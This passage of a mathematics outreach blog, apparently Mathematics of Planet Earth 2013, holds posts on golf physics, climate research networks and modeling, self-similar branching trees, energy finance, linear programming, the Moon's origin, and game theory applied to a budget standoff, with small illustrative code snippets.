From October 9-13, 2013, many of the AIM staff were volunteering at a golf tournament, the Frys.com Open. This is a PGA Tour event and a benefit to many charities, including AIM. One of the days was designated AIM Day to highlight the activities at AIM, and one of the things the tournament directors asked us to do was make up a math-and-golf quiz.

Now we, like probably most mathematicians, don't really think too much about the game of golf, but the quiz made us do a little investigating. One of the things we discovered was a wonderful talk by Doug Arnold, who does think quite a bit about golf! The talk, “Mathematics that Swings: the Math Behind Golf,” is on YouTube.

This is a wonderful talk that starts off with some simple algebra and ends with hard problems in computation. Arnold discusses aspects such as mathematical models of a golfer's swing based on a double pendulum, the impact of the club on the ball, and the effect of dimples on the flight of the ball. This last topic is quite interesting. Although the weight and diameter of the ball are set by the rules, the number and configuration of dimples are not, and no optimal configuration is known. It is, however, roughly understood how the dimples make the balls travel farther.
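For the curious, swing models of this kind are usually built on the standard planar double pendulum, written here in textbook form with point masses at the ends of massless links and angles measured from the vertical (this is an illustration, not the specific formulation in the talk):

$$L = \tfrac{1}{2}(m_1+m_2)\,\ell_1^{2}\,\dot\theta_1^{2} + \tfrac{1}{2} m_2\,\ell_2^{2}\,\dot\theta_2^{2} + m_2\,\ell_1 \ell_2\,\dot\theta_1 \dot\theta_2 \cos(\theta_1-\theta_2) + (m_1+m_2)\,g\,\ell_1 \cos\theta_1 + m_2\,g\,\ell_2 \cos\theta_2,$$

where the first link (length $\ell_1$, mass $m_1$) plays the role of the arms and the second (length $\ell_2$, mass $m_2$) the club; the Euler-Lagrange equations of this Lagrangian give the coupled nonlinear system governing the swing.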

It may be a stretch to think of the mathematics of golf as an MPE topic, but it does reinforce the idea that mathematics is everywhere and the video is entertaining.

Estelle Basor
AIM

Posted in Computational Science, Dynamical Systems, Optimization | Leave a comment

Mathematics and Climate Research Network

The “Mathematics and Climate Research Network” (MCRN) held its annual meeting, October 7-12 in North Carolina.

The MCRN is a virtual organization. It brings together leading researchers across the US to study the mathematics that underlies climate science. Research is done collaboratively in focus groups over the Internet, and researchers get together once a year at the annual meeting to explore new ideas and set the agenda for upcoming activities.

The MCRN has connections with similar networks in the United Kingdom, the Netherlands, India, and Australia. After three years of operation, more than 100 researchers at about 50 institutions worldwide are currently affiliated with the Network. (You can find our pictures on the MCRN Web site under the “People” tab.) The Network is funded by a grant from the Division of Mathematical Sciences of the National Science Foundation.

This year’s annual meeting followed the format of previous meetings, with a Jr Researchers Meeting (October 7-9) followed by the Annual MCRN Meeting (October 10-11).

The Jr Researchers Meeting was held at the new Hampton Inn and Suites in Carrboro, near the campus of the University of North Carolina. It was attended by 34 Network participants, mostly grad students, postdocs, and junior faculty. This year’s technical talks focused on data assimilation, tipping points, and sea-ice interactions, and included a hands-on session on statistical techniques to analyze paleoclimate data for the presence of tipping points. A highlight of the meeting was a presentation on “Marine microbial processes: Climate Feedback and Model Formulation” by Professor Christof Meile from the Department of Marine Science at the University of Georgia. In addition, participants learned about preparing resumés, research statements and teaching statements for academic and non-academic jobs. Focus group sessions identified new research topics for the coming year and practiced the art of grant writing. Much of the instructional material (as well as curriculum materials, annotated reading lists, lecture notes, videos, and more) is available on the MCRN Web site under the tab “Education.”

The Annual Meeting was held at the offices of RENCI in Chapel Hill. (RENCI is the administrative center of the MCRN.) This meeting had 46 participants, including the senior researchers in the Network and many of the junior researchers. We heard reports from four Focus Groups:

  • Earth Orbitals
  • Tipping points
  • Ocean Circulation
  • Paleoclimate

In the past year, the Network held an internal competition for mini-grant proposals. Awards were made to the following projects (mentors in parentheses):

  • A Piecewise Smooth Conceptual Climate Model of the Neoproterozoic – Anna Barry and Esther Widiasih
  • Estimating non-global climate model parameters using ensemble Kalman filtering – Thomas Bellsky (Jesse Berwald and Lewis Mitchell)
  • Detection of critical transitions via topological methods (Jesse Berwald and Marian Gidea)
  • A Rigorous Analysis of the 4D-Var Estimation of Carbon Dioxide Surface Fluxes – Graham Cox and Sean Crowell (and Peter Rayner)
  • Conceptual Climate Models of Glacial/Interglaciation Cycles with Mixed Mode Oscillations – Andrew Roberts and Esther Widiasih
  • Phase Transitions in Arctic Melt Ponds – Ivan Sudakov (and Ken Golden and Yi-Ping Ma)
  • Testing Methods For The Detection Of Critical Transitions – Kaitlin Hill and Sarah Iams (and Jesse Berwald, Karna Gowda, Mary Silber, and Mary Lou Zeeman)
  • Mathematics of Climate Infographics in Teaching Calculus – Ivan Sudakov (and Alex Mahalov, Eric Kostelich and Tom Bellsky)

Each of the awardees gave a 5-minute presentation followed by 5 minutes of questions and discussion about future directions of the project.

On Thursday night, Professor Ken Golden (Department of Mathematics, University of Utah), delivered a public lecture on “Mathematics and the Melting Polar Ice Caps” at the Friday Center of the University of North Carolina. The lecture, which drew a large audience from the community, was followed by a poster and dessert reception.

The annual meeting has become an important focal point of the MCRN. While research is conducted over the Internet during most of the year, it is important to meet face-to-face at least once a year to introduce new members, identify new activities, and recharge the batteries. It makes sense to devote a separate meeting to the research activities of the junior members and to use the opportunity to improve their skills for the job market and future careers. The Annual Meeting serves a more forward-looking function; during the meeting much time was spent on planning future activities, both in the US and abroad in collaboration with the international partners. Organizing the two meetings back-to-back enhances the exchange of information and gets everyone involved in the planning process.

Posted in Climate, Mathematics, Workshop Report | Leave a comment

Two Books on Climate Modeling

I am normally a great fan of book reviews, but one which covered a book on climate caught my attention. I was troubled by the review that appeared in the Philadelphia Inquirer because of the way it treated climate science in general and modeling in particular.

The book review, Digging deeper on climate change by Frank Wilson [Philadelphia Inquirer, October 13, 2013], concerned the book The Whole Story of Climate: What Science Reveals About the Nature of Endless Change by E. Kirsten Peters. Wilson wrote:

“Climate science, with its computer models, is a Johnny-come-lately to the narrative. Not so geology. ‘For almost 200 years,’ Peters writes, ‘geologists have studied the basic evidence of how climate has changed on our planet.’ They work, not with computer models, but with ‘direct physical evidence left in the muck and rocks.’ “

This seems to denigrate the role of models. It is certainly important to look to the past to better understand our climate: its trends and the mechanisms that caused those trends. However, it is also important to understand the trends on a time scale that is much shorter than the geological one, that is, since the beginning of the industrial revolution, and the role of increasing CO2 in the atmosphere. Modeling the physics of the atmosphere and performing simulations using high-performance computing play a crucial role in understanding the possible state of the climate in the next 100 years and beyond.

Contrast the observation in Wilson’s book review to a recent textbook on climate science by Hans Kaper and Hans Engler, Mathematics and Climate [SIAM, 2013]. This book, intended for master’s level students or advanced undergraduates, introduces students to “mathematically interesting topics from climate science.” It addresses a broad range of topics, beginning with the variability of climate over geologic history as gleaned from “proxy data” taken from deep-sea sediment cores. Certainly this variability informs our understanding of past climate history, including warming and cooling trends.

The book moves from data of past climate history on to models of the ocean and atmosphere, coupled with data, covering an interesting bit of mathematics along the way. For example, students are exposed to the role of salinity in ocean circulation models and learn something about the dynamical systems used in these models. To give another example of the breadth of mathematical topics covered, various statistical and analytical tools are introduced and used to analyze the Mauna Loa CO2 data.
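As a small taste of the kind of analysis meant here, the sketch below fits a smooth trend plus an annual cycle to a CO2-like record by ordinary least squares. The data are synthetic (roughly Keeling-curve-shaped), not the actual Mauna Loa series, and the approach is a generic illustration rather than the book's specific treatment.

```python
# Fit a quadratic trend plus an annual sinusoid to a synthetic CO2-like record
# by ordinary least squares.  The data below are invented, not Mauna Loa data.
import numpy as np

rng = np.random.default_rng(2)
t = np.arange(1958, 2013, 1 / 12)                        # monthly time axis (years)
co2 = 315 + 0.8 * (t - 1958) + 0.012 * (t - 1958) ** 2 \
      + 3.0 * np.sin(2 * np.pi * t) + rng.normal(0, 0.3, t.size)

# Design matrix: constant, linear, quadratic trend + annual sine/cosine pair
X = np.column_stack([np.ones_like(t), t - 1958, (t - 1958) ** 2,
                     np.sin(2 * np.pi * t), np.cos(2 * np.pi * t)])
coef, *_ = np.linalg.lstsq(X, co2, rcond=None)

trend_rate_2012 = coef[1] + 2 * coef[2] * (2012 - 1958)   # d(trend)/dt in ppm/yr
seasonal_amp = np.hypot(coef[3], coef[4])
print("estimated growth rate in 2012: %.2f ppm/yr" % trend_rate_2012)
print("estimated seasonal amplitude: %.2f ppm" % seasonal_amp)
```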

Wilson, in his book review, states that “Using direct evidence rather than computer models, a geologist says a cold spell could be near.” That could be comforting news to some who want to ignore predictions of a warming planet, but it would be cold comfort. Mathematics, when used in the geosciences, tends to take a more balanced and calculating approach.

As Kaper and Engler point out in the preface to their book, “Understanding the Earth’s climate system and predicting its behavior under a range of ‘what if’ scenarios are among the greatest challenges for science today.” Physical modeling, mathematics, numerical simulation, and statistical analysis will continue to play a major role in addressing that challenge.

James Crowley
Executive Director
SIAM

Posted in Climate Modeling, Mathematics | Leave a comment

Thinking of Trees

It is October. Very soon the inspiring canvas of the Fall foliage will be gone and we will raise our eyes once in a while to enjoy the unexplained beauty of the branched architecture of the naked trees. Yet there might be more than sheer aesthetic pleasure in those views, and that is what today’s blog is about.

Nature exhibits many branching tree-like structures beyond botanical trees. River networks, Martian drainage basins, veins of botanical leaves, lung and blood systems, and lightning can all be represented as tree graphs. In addition, a number of dynamic processes, like the spread of a disease or rumor, the evolution of an earthquake aftershock sequence, or the transfer of gene characteristics from parents to children, can also be described by a (time-oriented) tree. This would sound like a trivial observation if not for the following fact. A majority of rigorously studied branching structures have been shown to be closely approximated by a simple two-parameter statistical model, a Tokunaga self-similar (TSS) tree. In other words, apparently diverse branching phenomena (think of the Mississippi River vs. a birch tree) are statistically similar to each other, with the observed differences being related to the value of a particular model parameter rather than to qualitative structural traits.

There exist two important types of self-similarity for trees. They are related to the Horton-Strahler and Tokunaga indexing schemes for tree branches. Introduced in hydrology in the mid-20th century to describe the dendritic structure of river networks, these schemes have since been rediscovered and used in other applied fields.


We give below some definitions, which do not affect the later parts of this blog and can be safely skipped.

The Horton-Strahler indexing assigns orders to the tree branches according to their relative importance in the hierarchy. Namely, for a rooted tree T we consider the operation of pruning – cutting the leaves as well as the single-child chains of vertices that contain a leaf. Clearly, consecutive application of pruning eliminates any finite tree in a finite number of steps. A vertex in T is assigned order r if it is removed from the tree during the r-th application of pruning. A branch is a sequence of adjacent vertices with the same order.
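To make the indexing concrete, here is a minimal sketch (my own, not from the references at the end of this post) that computes Horton-Strahler orders with the usual recursive rule, which is equivalent to the pruning definition above: a leaf has order 1, and an internal vertex receives the maximum order of its children, increased by one when that maximum is attained at least twice.

```python
# A minimal sketch: Horton-Strahler orders for a rooted tree given as a
# dictionary mapping each vertex to the list of its children.
def strahler(tree, v):
    kids = tree.get(v, [])
    if not kids:                      # a leaf has order 1
        return 1
    orders = [strahler(tree, c) for c in kids]
    top = max(orders)
    # the order increases only when the maximum is attained at least twice
    return top + 1 if orders.count(top) >= 2 else top

# Example: a root whose two subtrees both have order 2 gets order 3
tree = {"r": ["a", "b"], "a": ["a1", "a2"], "b": ["b1", "b2"]}
print(strahler(tree, "r"))            # -> 3
```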

Quite often, observed systems exhibit geometric decrease of the numbers Nr of branches of Horton-Strahler order r ≥ 1; this property is called Horton self-similarity. The common ratio R of the respective geometric series is called the Horton exponent.

A stronger Tokunaga self-similarity addresses so-called side branching – merging of branches of distinct orders. In a Tokunaga tree, the average number of branches of order i ≥ 1 that join a branch of order (i+k), k ≥ 1, is given by T_k = ac^(k-1). The positive numbers (a,c) are called Tokunaga parameters. Informally, the Tokunaga self-similarity implies that different levels of a hierarchical system have the same statistical structure, as is signified by the fact that T_k depends on the difference k between the child and parental branch orders but not on their absolute values.


A classical model that exhibits Horton and Tokunaga self-similarity is the critical binary Galton-Watson branching process (Burd et al., 2000), also known in hydrology as Shreve’s random topology model. This model has R = 4 and (a,c) = (1,2).

The general interest in fractals and self-similar structures in the natural sciences during the 1990s led to a quest, mainly inspired and led by Donald Turcotte, for Tokunaga self-similar tree graphs of diverse origin. As a result, Horton and Tokunaga self-similarity with a broad range of respective parameters has been empirically or rigorously established in numerous observed and modeled systems, well beyond river networks. This includes botanical trees, the vein structure of botanical leaves, diffusion-limited aggregation, two-dimensional site percolation, nearest-neighbor clustering in Euclidean spaces, earthquake aftershock series, the dynamics of billiards, and some others (e.g., Newman et al., 1997; Turcotte et al., 1998; Kovchegov and Zaliapin, 2013 and references therein).

The increasing empirical evidence prompts the question: What basic probability models can generate Tokunaga self-similar trees with a range of parameters? (Or, more informally, do we see Tokunaga trees everywhere because of our inability to reject the Tokunaga hypothesis, or because of the actual importance of the Tokunaga constraint?)

Burd et al. (2000) demonstrated that Tokunaga self-similarity is a characteristic property of critical binary branching in the broad class of (not necessarily binary) Galton-Watson processes. Recently, Zaliapin and Kovchegov (2012) studied the level-set tree representation of time series (an inverse of the Harris path) and established Horton and Tokunaga self-similarity of a symmetric random walk and a regular Brownian motion. They also demonstrated Horton self-similarity of Kingman’s coalescent process and presented the respective Tokunaga self-similarity as a numerical conjecture (Kovchegov and Zaliapin, 2013). Other recent numerical experiments suggest that multiplicative and additive coalescents, as well as fractional Brownian motions, also correspond to Tokunaga self-similar trees.

These results (i) expand the class of Horton and Tokunaga self-similar processes beyond the critical binary Galton-Watson branching, and (ii) suggest that simple models of branching, aggregation, and time series generically lead to the Tokunaga self-similarity. This makes the omnipresence of Tokunaga trees in observations less mysterious and opens an interesting avenue for further research. In particular, the equivalence of different processes via their respective tree representation (as is the case for Kingman’s coalescent and white noise, see Zaliapin and Kovchegov (2013)) may broaden the toolbox of empirical and theoretical exploration of various branching phenomena.

References:

G. A. Burd, E.C. Waymire, R.D. Winn, A self-similar invariance of critical binary Galton-Watson trees, Bernoulli, 6 (2000) 1–21.

Y. Kovchegov and I. Zaliapin, Horton self-similarity of Kingman’s coalescent tree, arXiv:1207.7108, 2013

W. I. Newman, D.L. Turcotte, A.M. Gabrielov, Fractal trees with side branching, Fractals, 5 (1997) 603–614.

D.L. Turcotte, J.D. Pelletier, and W.I. Newman, Networks with side branching in biology, J. Theor. Biol., 193 (1998) 577–592.

I. Zaliapin and Y. Kovchegov, Tokunaga and Horton self-similarity for level set trees of Markov chains, Chaos, Solitons & Fractals, 45, Issue 3 (2012) 358–372.

Ilya Zaliapin
Associate Professor
Department of Mathematics and Statistics
University of Nevada, Reno

Posted in Dynamical Systems, Mathematics, Patterns | Leave a comment

Fields Institute: Focus Program on Commodities, Energy and Environmental Finance

During August 2013, the Fields Institute in Toronto hosted a Focus Program on Commodities, Energy and Environmental Finance. The Focus Program addressed the interaction of markets and environment, including such MPE themes as sustainable development, effective risk management of weather events, and the role of finance in the production and consumption of energy. The busy month had a variety of activities, including three summer school mini-courses, two research workshops, and a lively seminar series. Nearly all events have been video recorded and archived, available for viewing any time.

A particular highlight was provided by two panel discussions that explored how mathematicians can contribute to environmental policy making. One of the panelists, Ron Dembo of Zerofootprint (a “cleantech” software company that was one of the sponsors of the Program and provided carbon offsets for participants’ travel), exhorted mathematicians to advocate for “hedging our climate”, i.e., applying quantitative risk-management techniques to assess the threat of and response to climate change. Another panelist, Matheus Grasselli (McMaster), pointed out how mathematical methods are helping revitalize macroeconomic thinking about the interaction between finance and the real economy, with similar implications for environmental action. There was also good industry involvement, particularly with participants from Electricité de France and Ontario Power Generation. Hans Tuenter from the latter utility gave an enlightening 90-minute tutorial on wind power and how subsidized renewables have led to negative power prices in Ontario.

Over 40 different presentations were delivered during the Program. Fred Benth (Oslo) explained how to stochastically model wind speeds at a given location (relevant for installing wind turbines), which led to a discussion of recent developments in CARMA (continuous auto-regressive moving average) models. Rene Carmona (Princeton) reviewed the contradictory evidence regarding the influence of financial traders on commodity prices (so-called financialization). Almut Veraart (LSE) presented the newly developed theory of ambit fields, which generalize Gaussian random fields and have applications to multivariate modeling of electricity prices; Michael Coulon (Princeton) discussed the detailed features of the New Jersey market for solar renewable energy certificates. A trio of talks by Minyi Huang (Carleton), Francois Delarue (Nice) and Daniel Lacker (Princeton) focused on the latest results in the rapidly growing area of mean field games, which provides notions of stochastic equilibrium among infinitely many interacting agents. A number of talks (Mike Ludkovski and Xuwei Yang (both UCSB), and Ronnie Sircar (Princeton)) discussed the interplay between exploration for new fuels, improvements in renewable technology, and uncertain demand within a dynamic game-theoretic framework. The interplay between electricity markets and carbon emissions was discussed both by mathematicians, such as Mireille Bossy (INRIA), and economists, such as Frank Wolak (Stanford).

Overall, the Focus Program was a great success, and has stimulated many new interactions among the participants. In particular, attendees commented on the multi-disciplinary developments currently taking place in the subject, with mathematicians, probabilists, statisticians, industrial and operations engineers, economists and finance practitioners all working simultaneously (and frequently together) on the same problems. We are planning a volume of papers devoted to work presented during the Focus Program, to appear in Summer 2014. The field of commodities and environmental finance continues its rapid growth and is sure to bring forth many more developments in the near future.

Mike Ludkovski
Department of Statistics and Applied Probability
University of California Santa Barbara

Ronnie Sircar
Department of Operations Research and Financial Engineering
Princeton University

Posted in Energy, Finance, Risk Analysis, Sustainability, Workshop Report | Leave a comment

ICERM Workshop “From the Clinic to Partial Differential Equations and Back: Emerging Challenges for Cardiovascular Mathematics”

In recent years, there have been great advances in mathematical and computational modeling of cardiovascular phenomena. The ultimate goal is to develop predictive mathematical tools that can be used in medical decision-making and treatment. There has been notable success in some areas; for example, extensive numerical simulation is used in some hospitals to plan pediatric heart surgery. However, further progress is needed for the use of such mathematics-based methods to become widespread and routine. Additional advances will require close communication and collaboration between mathematical scientists and physiologists in order to guide further developments most effectively.

ICERM, the Institute for Computational and Experimental Research in Mathematics at Brown University, will host a workshop entitled “From the Clinic to Partial Differential Equations and Back: Emerging Challenges for Cardiovascular Mathematics,” January 20-24, 2014. The aim is to bring mathematicians and medical doctors together to foster collaboration on modeling the cardiovascular system. The workshop will be organized along two lines: “core topics” in mathematical and numerical methods that require further research; and “new challenges” arising from cardiovascular problems and diseases that have not been attacked extensively with numerical tools. The “core topics” will include fluid-structure interaction, multi-scale dynamics, and data assimilation. The “new challenges” will focus on liver circulation, cardiac re-synchronization therapy, chronic venous insufficiency, and coiling of intracranial aneurysms. The workshop format will include round-table discussions in small groups as well as lectures.

Cardiac Mathematics
More information about the workshop, including a current speaker and participant list, can be found here. Those interested in participating in the workshop are encouraged to apply online here. Limited funds are available for participant support; requests for funding can be indicated in the online application.

Posted in Workshop Announcement | Leave a comment

How Applied Mathematics Can Help Money Grow on Trees

Linear programming combines large numbers of simple rules to solve real-world problems

A Berkeley graduate student, George Dantzig, was late for class. He scribbled down two problems from the blackboard and handed in solutions a few days later. But the problems on the board were not homework assignments; they were two famous unsolved problems in statistics. The solutions earned Dantzig his PhD.

With his doctorate in his pocket, he went to work with the US Air Force, designing schedules for training, stock distribution and troop deployment, activities known as programming. He was so efficient that, after the Second World War, he was given a well-paid job at the Pentagon, with the task of mechanizing the program planning of the military. There he devised a dramatically successful technique, or algorithm, which he named linear programming (LP).

LP is a method for decision-making in a broad range of economic areas. Industrial activities are frequently limited by constraints. For example, there are normally constraints on raw materials and on the number of staff available. Dantzig assumed these constraints to be linear, with the variables, or unknown quantities, occurring in a simple form. This makes sense: if it requires four tons of raw material to make 1,000 widgets, then eight tons are needed to make 2,000 widgets. Double the output requires double the resources.

LP finds the maximum value of a quantity, such as output volume or total profit, subject to the constraints. This quantity, called the objective, is also linear in the variables. A real-life problem may have hundreds of thousands of variables and constraints, so a systematic method is needed to find an optimal solution. Dantzig devised a method ideally suited to LP, called the simplex method.
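To make this concrete, here is a toy sketch (the products and numbers are invented, and SciPy’s linprog routine stands in for Dantzig’s simplex code): maximize the profit from two products subject to limits on raw material and staff hours.

```python
# A toy linear program: maximize 3*x1 + 5*x2 subject to resource constraints.
from scipy.optimize import linprog

c = [-3.0, -5.0]            # profits per unit; linprog minimizes, so negate
A_ub = [[4, 8],             # 4*x1 + 8*x2 <= 40  (tons of raw material)
        [2, 1]]             # 2*x1 + 1*x2 <= 14  (staff hours)
b_ub = [40, 14]

res = linprog(c, A_ub=A_ub, b_ub=b_ub,
              bounds=[(0, None), (0, None)], method="highs")
print(res.x, -res.fun)      # optimal production plan and maximum profit
```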

At a conference in Wisconsin in 1948, when Dantzig presented his algorithm, a senior academic objected, saying: “But we all know the world is nonlinear.” Dantzig was nonplussed by this put-down, but an audience member rose to his defence, saying: “The speaker titled his talk ‘Linear Programming’ and carefully stated his axioms. If you have an application that satisfies the axioms, then use it. If it does not, then don’t.” This respondent was none other than John von Neumann, the leading applied mathematician of the 20th century.

LP is used in a number of Irish industries. One interesting application, used by Coillte, is harvest scheduling. This enables decisions to be made about when and where to cut trees in order to maximize the long-term financial benefits. A more advanced system, which incorporates environmental and social constraints in addition to economic factors, is being developed by Coillte and UCD Forestry.

Coillte uses linear programming to make decisions about when and where to cut trees to maximize long-term benefits

The acid test of an algorithm is its capacity to solve the problems for which it was devised. LP is an amazing way of combining a large number of simple rules and obtaining an optimal result. It is used in manufacturing, mining, airline scheduling, power generation and food production, maximizing efficiency and saving enormous amounts of natural resources every day. It is one of the great success stories of applied mathematics.

Peter Lynch, Professor of Meteorology
School of Mathematical Sciences
University College Dublin
Belfield, Dublin 4, Ireland
Home Page

Professor Lynch blogs at thatsmaths.com.

This article appeared in The Irish Times of Tuesday, October 8, 2013. Reprinted with the author’s permission.

Posted in Finance, Optimization, Resource Management | 1 Comment

Coming Soon in SIAM News

SIAM News will feature two lead articles that are very relevant to the themes of Math of Planet Earth. One, by writer Dana Mackenzie, is about mathematical modeling of traffic flows; the other, by writer Barry Cipra, is about reducing energy consumption in buildings.

Based on a talk by John Burns of Virginia Tech, this second article describes some of the mathematical challenges in increasing energy efficiency in modern commercial buildings. Why is this an important problem? According to the article, “buildings consume an enormous amount of energy,” accounting “for roughly 39% of total U.S. energy consumption.” In his talk, Burns brought home this point in a vivid way. A 70% reduction in energy consumption by residential and commercial buildings “would be equivalent to eliminating the entire U.S. transportation system.”
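A rough check makes the comparison plausible: 70% of the 39% of U.S. energy consumed by buildings is about 27% of total consumption, which is close to the share commonly attributed to the transportation sector (roughly 28% in widely cited estimates).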

The article by Cipra discusses the mathematical challenges, quoting Burns: “buildings are complex, multi-scale, nonlinear, infinite-dimensional systems with hundreds of components that call for modeling, control, optimization,….” It further discusses modeling buildings for design and control.

To appear in the November issue of SIAM News.

Posted in Energy, Transportation | Leave a comment

Where Did the Moon Come From?

You may have read Edward Belbruno’s blog on New Ways to the Moon, Origin of the Moon, and Origin of Life on Earth of October 4th. I did, and I was intrigued by his application of weak transfer to the origin of the Moon, so I went to his 2005 joint paper of the same title with J. Richard Gott III, published in the Astronomical Journal.

Indeed, I already knew of the earlier work of Jacques Laskar on the Moon from 1993. At the time, he had proved that it was the presence of the Moon that stabilizes the inclination of the Earth’s axis. The axis of Mars, for instance, has very large oscillations, up to 60 degrees, and Venus’s axis also had large oscillations in the past. Numerical simulations show that, without the Moon, the Earth’s axis would also have very large oscillations. Hence, the Moon is responsible for the stable system of seasons that we have on Earth, which may have favored life on our planet.

The current most plausible theory for the formation of the Moon is that it comes from the impact of a Mars-size planet with the Earth, which we will call the impactor. For information, the radius of Mars is 53% of that of the Earth, its volume is 15% of that of the Earth, and its mass only 10%. Evidence supporting the impactor hypothesis comes from the geological side: the Earth and the Moon contain the same types of oxygen isotopes, which are not found elsewhere in the solar system. The Earth and Mars both have an iron core, while the Moon has none. The theory is that, at the time of the collision, the iron in the Earth and in the impactor would already have sunk into their core, and also that the collision was relatively weak, hence only expelling debris from the mantle which would later aggregate into the Moon, while the two iron cores would have merged together. Indeed, the mean density of the Moon is comparable to that of the mean density of the Earth’s crust and upper mantle.

Mathematics cannot prove the origin of the Moon. It can only provide models which show that the scenario of the giant impactor makes sense, and that it makes more sense than other proposed scenarios. It is believed that the planets formed by accretion of small objects, called planetesimals. Because the impactor and the Earth had similar composition, they should have formed at roughly the same distance from the Sun, namely one astronomical unit (AU). But then, why would it have taken so long before a collision occurred? Because the Earth and the impactor were at stable positions. The Sun, the Earth and the impactor form a 3-body problem. Lagrange identified some periodic motions of three bodies where they are located at the vertices of an equilateral triangle: the corresponding points for the third body are called the Lagrange L4 and L5 points. These motions are stable when the mass of the Earth is much smaller than that of the Sun and the mass of the impactor is small compared to that of the Earth (here, 10% of the Earth’s mass). Stability is shown rigorously using KAM theory for the ideal circular planar restricted problem and numerically for the full 3-dimensional 3-body problem, with integration over 10 Myr.
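As a back-of-the-envelope illustration (my own sketch, not taken from the paper), the classical Gascheau-Routh criterion for linear stability of the equilateral configuration, 27(m1m2 + m2m3 + m3m1) < (m1 + m2 + m3)^2, is easily checked for a Sun-Earth-Theia triangle:

```python
# Stability check for the Lagrange equilateral configuration (masses in solar masses).
m_sun, m_earth = 1.0, 3.0e-6
m_theia = 0.1 * m_earth          # a Mars-size impactor, 10% of the Earth's mass

ratio = (27 * (m_sun * m_earth + m_earth * m_theia + m_theia * m_sun)
         / (m_sun + m_earth + m_theia) ** 2)
print(ratio, ratio < 1)          # ~9e-5, far below the instability threshold of 1
```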

Hence, it makes sense that a giant impactor could have formed at L4 or L5: this impactor is called Theia in the literature on the subject. Simulations indeed show that Theia could have grown by attracting planetesimals in its neighborhood. Let us suppose that Theia formed at L4. Why then didn’t it stay there? Obviously, it must have been destabilized. Simulations show that some small planetesimals located near the same Lagrange point could have slowly pushed Theia away from L4. The article by Belbruno and Gott studies the potential motions after destabilization. What is crucial is that, since the three bodies were at the vertices of an equilateral triangle, Theia and the Earth were at equal distances from the Sun. If the orbit of the Earth is nearly circular, Theia and the Earth share almost the same orbit! This is why there is a high danger of collision once Theia is destabilized.

If the ejection speed were small, Theia would move back and forth along a trajectory resembling a circular arc centered at the Sun with additional smaller oscillations. In a frame centered at the Sun and rotating with the Earth (hence the Earth is almost fixed), Theia moves back and forth in a region that looks like a horseshoe (see figure).

Theia

In this movement it never passes close to the Earth. An asteroid with a diameter of about 100 m, 2002 AA29, discovered in 2002, has this type of orbit. This horseshoe region almost overlaps the Earth’s orbit. For a higher ejection speed, Theia would be pushed into an orbit around the Sun with radius approximately 1 AU and would gradually creep towards the Earth’s orbit: it would pass regularly close to the Earth’s periapsis (the point of the Earth’s orbit closest to the Sun) on nearly parabolic trajectories, i.e., trajectories on the borderline of being captured by the Earth. Since the velocity vectors of the two planets are almost parallel, the gravitational perturbation exerted by the Earth on Theia at each fly-by is small. The simulations show that these trajectories have a high probability of collision with the Earth not long after leaving the Lagrange points (on the order of 100 years). Note that this kind of trajectory is highly chaotic, and many simulations with nearby initial conditions are needed to see the different potential types of trajectories.

The five Lagrange points, L1, L2, L3, L4, L5 (figure from Belbruno).

Christiane Rousseau

Posted in General | Leave a comment

Budget Chicken

More and more the political wrangling over the government shutdown (and the looming debt ceiling) is described as a game of “Chicken,” which you probably know is the suicidal, hormonally charged confrontation of two teenage boys driving down a highway straight at each other. Whoever swerves first loses, but if neither swerves they also lose.

It does seem more complicated than that to me, but it could be instructive to analyze the game of Chicken from the perspective of classical game theory. For this we assign numerical values to the various outcomes of the players’ choices. I will use the numbers in Philip Straffin’s book Game Theory and Strategy, published by the MAA. There are two players, A and B (Administration and Boehner). Each has two strategies: swerve or don’t swerve. The rows of the payoff matrix represent A’s choices and the columns the choices of B. There is a pair of numbers for each of the four outcomes, with the first number being the payoff to A and the second the payoff to B.

                 B: swerve    B: don’t
A: swerve         (0,0)        (-2,1)
A: don’t          (1,-2)       (-8,-8)

For example, the pair (-2,1) in the upper right corner means that if A swerves and B doesn’t, then A loses two units and B gains one unit. Chicken is not a zero-sum game.

There are two Nash equilibria in the payoff matrix. These are the upper right and lower left corners in which one player swerves and the other doesn’t. With these scenarios neither player can do better by switching to a different option when the other player does not switch. (The definition of a Nash equilibrium is just that: it is a simultaneous choice of strategies for all the players so that no player can improve his lot by switching under the assumption that the other players do not change their choices.)

In addition, these Nash equilibria are optimal in the sense that there is not any other outcome that improves the lot of at least one of the players without making it worse for another player. (This is called Pareto optimality.) There is also a Nash equilibrium among the mixed strategies, where a mixed strategy is a probabilistic mixture of the two pure strategies. That is, for each p between 0 and 1, there is the mixed strategy of swerving with probability p and not swerving with probability 1-p. Then one can show that the mixed strategy with p=6/7 (i.e., swerve with probability 6/7, don’t swerve with probability 1/7) is also a Nash equilibrium, which means that neither player can do better by using a different mixed strategy assuming that the other player sticks with this one. In this case the payoff to each player is -2/7. Now, the payoffs are equal but this outcome is not Pareto optimal because both players can do better with the strategy of swerving in which case each receives 0.
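The indifference calculation behind p = 6/7 takes only a few lines to verify (a sketch of the arithmetic, not taken from Straffin’s book):

```python
# If the opponent swerves with probability p = 6/7, both pure strategies
# yield the same expected payoff, so neither player can do better.
from fractions import Fraction

p = Fraction(6, 7)
payoff_swerve = 0 * p + (-2) * (1 - p)   # expected payoff of swerving
payoff_dont   = 1 * p + (-8) * (1 - p)   # expected payoff of not swerving
print(payoff_swerve, payoff_dont)        # both equal -2/7
```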

And so it seems that there is no satisfactory solution to the game of Chicken and related games such as The Prisoner’s Dilemma—at least within the confines of classical game theory.

For some current commentary on game theory and the budget stalemate read the interview with Daniel Diermeier in the Washington Post.

Posted in Mathematics, Political Systems | Leave a comment

SIAM Conference on the Analysis of PDEs

Mathematics has always responded to demands of applications, even as mathematics continued to develop its own internal structures. One need only look back to the mid-twentieth century to see the mathematics spawned by demands of the military needs of the time. Today we see a tremendous growth in applied mathematics related to biology and medicine.

As an example, consider SIAM’s final conference in the year of Mathematics of Planet Earth—the SIAM Conference on the Analysis of PDEs. Applied PDEs were at one time primarily (although not exclusively) driven by problems in fluid flow, from the dynamics of flows across airplane surfaces to the large-scale motion of atmospheric systems. While these problems continue to have importance, more recent applications have grown as well, including problems in imaging and in biology. These trends are indicated in the invited talks at the conference.

Among the invited presentations are two talks related to biology that show the role of mathematics.

